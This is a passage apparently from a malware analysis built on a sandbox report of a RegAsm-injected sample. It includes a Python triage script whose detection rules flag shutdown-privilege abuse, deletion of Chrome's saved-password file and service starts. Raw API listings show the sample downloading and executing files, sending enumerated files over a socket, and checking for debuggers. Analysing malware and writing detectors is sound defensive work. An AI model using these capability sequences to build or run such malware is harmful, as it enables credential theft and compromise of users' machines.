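  • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
  • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
• ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
• LoadLibraryA.KERNEL32(PowrProf.dll), ref: 004168A6
• GetProcAddress.KERNEL32(00000000), ref: 004168AD
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• String ID: !D@$PowrProf.dll$SetSuspendState
APIs
• DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
• GetLastError.KERNEL32 ref: 0040BA93
Strings
• [Chrome StoredLogins not found], xrefs: 0040BAAD
• \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
• [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
Similarity
• String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
• OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
• StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
Similarity
• String ID:
"""

# "• [Part of subcall function XXXX: ]Name.Module(args), ref: ADDR"
# (args and the comma are absent for calls such as GetLastError.KERNEL32)
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<name>[\w@]+)\.(?P<module>[\w.]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})$"
)
STRING_RE = re.compile(r"^•\s*(?P<text>.*), xrefs: (?P<ref>[0-9A-F]{8})$")
STRING_ID_RE = re.compile(r"^•\s*String ID:\s*(?P<ids>.*)$")
HEADINGS = {"APIs": "apis", "Strings": "strings", "Similarity": "similarity"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: str
    ref: str                 # call-site address
    subcall: Optional[str]   # callee address when the line is "Part of subcall function"


@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    string_ids: list = field(default_factory=list)  # tokens of the "String ID" bullet

    @property
    def label(self) -> str:
        """Call site of the first API the function issues directly."""
        for call in self.apis:
            if call.subcall is None:
                return call.ref
        return self.apis[0].ref if self.apis else "?"

    def has_api(self, *names: str) -> bool:
        return any(call.name in names for call in self.apis)

    def text(self) -> str:
        """Everything a rule may search: call arguments, listed strings, String ID tokens."""
        return "\n".join([c.args for c in self.apis] + self.strings + self.string_ids)


def parse_blocks(text: str) -> list:
    """Split the listing into FunctionBlocks; a block opens at each 'APIs' heading."""
    blocks, section, cur = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":
            cur = FunctionBlock()
            blocks.append(cur)
        if line in HEADINGS:
            section = HEADINGS[line]
            continue
        if not line.startswith("•"):      # any other heading (Memory Dump Source, ...)
            section = None
            continue
        if cur is None:
            continue
        if section == "apis":
            m = API_RE.match(line)
            if m:
                cur.apis.append(ApiCall(m["name"], m["module"], m["args"] or "", m["ref"], m["sub"]))
        elif section == "strings":
            m = STRING_RE.match(line)
            if m:
                cur.strings.append(m["text"])
        elif section == "similarity":
            m = STRING_ID_RE.match(line)
            if m:
                cur.string_ids.extend(t for t in m["ids"].split("$") if t)
    return blocks


RULES = {
    # SeShutdownPrivilege enabled, then ExitWindowsEx or SetSuspendState (PowrProf.dll)
    "power_control": lambda b: b.has_api("AdjustTokenPrivileges")
        and "SeShutdownPrivilege" in b.text()
        and (b.has_api("ExitWindowsEx") or "SetSuspendState" in b.text()),
    # Deletes the Chrome password store rather than reading it
    "browser_login_data_wipe": lambda b: b.has_api("DeleteFileA", "DeleteFileW")
        and "Login Data" in b.text(),
    # Opens the SCM and starts an existing service
    "service_start": lambda b: b.has_api("OpenSCManagerW", "OpenSCManagerA")
        and b.has_api("StartServiceW", "StartServiceA"),
}


def triage(report_text: str) -> dict:
    """Map each block's label (first direct call site) to the sorted rule names it matches."""
    findings = {}
    for block in parse_blocks(report_text):
        hits = sorted(name for name, rule in RULES.items() if rule(block))
        if hits:
            findings[block.label] = hits
    return findings


if __name__ == "__main__":
    for label, hits in triage(SAMPLE_REPORT).items():
        print(f"function @ {label}: {', '.join(hits)}")
```

Subcall lines are kept inside the block they appear in, because the capability is what the caller achieves; the privilege routine at 0x0041798D is listed on its own above and would not match power_control by itself, only together with ExitWindowsEx in its caller. Run against the full report text, the parser tolerates the extra headings (Memory Dump Source, Joe Sandbox IDA Plugin, Yara matches) by ignoring any bullet outside the three sections it knows.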
APIs
• GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
• GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
• GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: InfoLocale
• String ID: ACP$OCP
• API String ID: 2299586839-711371036
• Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                                                                                                                                  • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000,?,0040F419,00000000), ref: 0041B54A
                                                                                                                                                                                                  • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                                                                                                                                                                                  • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                                                                                                                                                                                  • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                  • String ID: SETTINGS
                                                                                                                                                                                                  • API String ID: 3473537107-594951305
                                                                                                                                                                                                  • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                                                                                                                                                                  • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004096A5
                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Find$File$CloseFirstH_prologNext
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1157919129-0
                                                                                                                                                                                                  • Opcode ID: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                                                                                                                                                                                                  • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0040884C
                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                                                                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1771804793-0
                                                                                                                                                                                                  • Opcode ID: ec9c60c0984909d8cd4645444dd457f9d8bf9c0522e2e7366979e8a6a318d365
                                                                                                                                                                                                  • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec9c60c0984909d8cd4645444dd457f9d8bf9c0522e2e7366979e8a6a318d365
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                                                                                                                                                                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DownloadExecuteFileShell
                                                                                                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                                                                                                                                                                                  • API String ID: 2825088817-3056885514
                                                                                                                                                                                                  • Opcode ID: bb7b935ec16baebde2972a127086196db108f891a0ecdc83552d77310a0d38e2
                                                                                                                                                                                                  • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb7b935ec16baebde2972a127086196db108f891a0ecdc83552d77310a0d38e2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 2829624132-2084328917
                                                                                                                                                                                                  • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                                                                                                                                                                  • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
• Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
APIs
• FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
• FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: FileFind$FirstNextsend
• String ID: XPG$XPG
• API String ID: 4113138495-1962359302
• Opcode ID: 3d84d9c70616012fa8221750c6a8410ee04de753accb1628ad2af8c264aec63b
• Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
• Opcode Fuzzy Hash: 3d84d9c70616012fa8221750c6a8410ee04de753accb1628ad2af8c264aec63b
• Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
APIs
• SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
  • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
  • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
  • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?), ref: 004137EC
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CloseCreateInfoParametersSystemValue
• String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
• API String ID: 4127273184-3576401099
• Opcode ID: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
• Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
• Opcode Fuzzy Hash: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
• Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
APIs
• IsDebuggerPresent.KERNEL32 ref: 0043BC69
• SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC73
• UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID: t'`/
• API String ID: 3906539128-2084328917
• Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
• Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
• Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
• Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
• IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
• String ID: t'`/
• API String ID: 1661935332-2084328917
• Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
• Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
• Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
• Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID:
• String ID: .$t'`/
• API String ID: 0-810986392
• Opcode ID: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
• Instruction ID: 7baa6cf80f4bdea99dbc4d330b45aada8194c6230f36d830dc1b60d3871032d3
• Opcode Fuzzy Hash: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
• Instruction Fuzzy Hash: DF3107B1900259AFEB24DE7ACC84EFB7BBDEB46318F0401AEF41897291E6349D418B54
APIs
  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
• EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID: p'E$JD
• API String ID: 1084509184-908320845
• Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
• Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
• Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
• Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
APIs
• GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: InfoLocale
• String ID: GetLocaleInfoEx$t'`/
• API String ID: 2299586839-1519066704
• Opcode ID: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
• Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
• Opcode Fuzzy Hash: a6f31f6a822a68a73c6fa21f72a86d6968122590954041d098649a345c0d9b9f
• Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100061E4
                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 100061F1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                                                                                  • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                                                                                                  • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 10004AEE
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                  • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                                                                                  • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0044338F
                                                                                                                                                                                                  Memory Dump Source
